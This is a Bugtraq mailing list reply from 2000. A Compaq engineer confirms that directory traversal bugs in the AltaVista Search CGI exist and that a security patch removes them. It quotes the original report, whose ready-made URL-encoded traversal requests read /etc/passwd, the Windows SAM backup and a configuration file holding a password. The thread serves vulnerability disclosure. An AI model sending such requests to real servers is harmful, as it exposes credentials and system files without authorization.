Bugtraq mailing list archives
Re: Altavista followup
From: Guy.Roelandts () COMPAQ COM (Roelandts, Guy)
Date: Tue, 11 Jan 2000 07:54:38 -0000
Hi Rudi, Just tried to reproduce the bugs you were talking about, and I can confirm that they exist without their secpatch and that they are gone after having installed the secpatch. Guy ROELANDTS Compaq EMEA
-----Original Message----- From: rudi carell [mailto:rudicarell () HOTMAIL COM] Sent: Sunday, January 09, 2000 4:37 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: Altavista followup hola, more bugs in the AV-Search thing .. using uri-encoded strings it is possible to view "any" file on the system .. examples: unixxxsss ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/ etc/passwd or on an micro$oft IIS ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r epair\\sam._ interesting infos about the file structure ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde xer.log or another file which does contain the password .. http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli cy.conf altavista told me that this is(was) just a flavour of the "old" bug and its fix is(was) included in the last secpatch. whatever .... nicedays:-/ RC rudicarell () hotmail com
Current thread:
- Re: Altavista followup Roelandts, Guy (Jan 10)